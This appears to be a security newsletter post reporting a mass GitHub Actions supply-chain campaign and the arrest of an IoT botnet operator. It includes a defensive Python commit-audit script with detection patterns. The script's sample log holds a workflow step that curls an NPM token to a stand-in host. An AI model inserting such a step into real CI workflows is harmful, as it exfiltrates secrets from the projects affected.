GitHub's 6-Hour Repo Bloodbath 🦈 and a 30 Tbps Botnet Bust 🚨
Two stories grabbed the security world's attention today: one of the largest GitHub supply-chain attacks ever recorded, and the takedown of a botnet operator behind record-breaking 30 Tbps DDoS strikes. Here's what happened and why it matters.
GitHub's Six-Hour Nightmare: 5,561 Repos Backdoored in a Single Afternoon
An automated campaign dubbed "Megalodon" pushed 5,718 malicious commits into 5,561 GitHub repositories in just six hours, sneaking hidden code into the GitHub Actions workflows that those projects use to build and release software. The payloads quietly siphon CI secrets, cloud credentials, SSH keys, and OIDC tokens out to an attacker-controlled server, and the worst variants leave behind dormant backdoors that an attacker can trigger later without any visible build activity. The campaign already cascaded into npm, poisoning multiple released versions of a popular package and putting every downstream user of those builds at risk.
Why should you care, even if you don't write code? Software supply-chain attacks like this are how attackers reach millions of people at once — the apps and services your business relies on are built on top of repositories like these, and a single compromised build pipeline can quietly push malware into widely-used products. If your team uses GitHub Actions, today is a good day to audit recent commits, rotate any CI secrets, and review cloud audit logs for unfamiliar token requests.
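One way to carry out the commit audit suggested above, as an added example (not code from the original post or from GitHub): it scans `git log -p` output restricted to `.github/workflows` and flags added lines that match a few heuristic patterns. The patterns, the sample log, and the host name are assumptions constructed for illustration, not indicators from the Megalodon campaign.

```python
import re

# Heuristic rules (assumptions for illustration, not indicators published for this
# campaign): added lines that read secrets, request an OIDC token, or call out.
RULES = {
    "secrets-reference": re.compile(r"\$\{\{\s*secrets\."),
    "oidc-token-write": re.compile(r"id-token:\s*write"),
    "outbound-request": re.compile(r"\b(curl|wget)\b"),
}

def audit_workflow_log(log_text):
    """Return (commit, author, file, rule, line) for each flagged added line."""
    findings, commit, author, path, in_hunk = [], None, None, None, False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            _, commit, author = line.split(" ", 2)
            path, in_hunk = None, False
        elif line.startswith("diff --git "):
            path, in_hunk = None, False
        elif not in_hunk and line.startswith("+++ "):
            path = line[6:] if line.startswith("+++ b/") else line[4:]
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and line.startswith("+"):
            for rule, pattern in RULES.items():
                if pattern.search(line[1:]):
                    findings.append((commit[:12], author, path, rule, line[1:].strip()))
    return findings

# Constructed sample (hash, address and host are made up) in the shape printed by:
#   git log --since="7 days ago" -p --format="commit %H %ae" -- .github/workflows
SAMPLE_LOG = """\
commit 1a2b3c4d5e6f1a2b3c4d5e6f1a2b3c4d5e6f1a2b dev@example.com

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -11,2 +11,6 @@ jobs:
       - uses: actions/checkout@v4
+      - name: cache warmup
+        run: curl -s -d "$TOKEN" https://collector.example.invalid/u
+        env:
+          TOKEN: ${{ secrets.NPM_TOKEN }}
       - run: npm ci
"""

if __name__ == "__main__":
    for finding in audit_workflow_log(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

A hit is a prompt for human review of that commit and its author, not proof of compromise; legitimate workflows reference secrets and fetch dependencies too.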
The 30 Tbps Botnet Kingpin Has Been Cuffed
A 23-year-old known online as "Dort" was arrested in Ottawa on a U.S. extradition warrant for allegedly running Kimwolf, an Internet-of-Things botnet that turned hijacked photo frames and webcams into a weapon capable of launching record-setting 30 Tbps DDoS attacks. Investigators say the network issued more than 25,000 attack commands, hit U.S. Department of Defense targets, and racked up over a million dollars in damages per victim — and that the operator orchestrated swatting attacks against a researcher who exposed the IoT flaw Kimwolf exploited. Authorities also seized infrastructure for three competing botnets and shut down nearly 50 DDoS-for-hire services in a coordinated international sweep.
Two big takeaways for everyone: cheap connected devices in your home or office (cameras, smart frames, sensors) are still favorite recruits for botnets, so keep firmware updated and isolate them on a separate network. And the era of "DDoS-for-hire" services treating attacks like a paid utility is increasingly running into serious law enforcement attention — a welcome shift for any business that has ever been knocked offline.
Stay ahead of threats with GOCO Security at gocosecurity.com.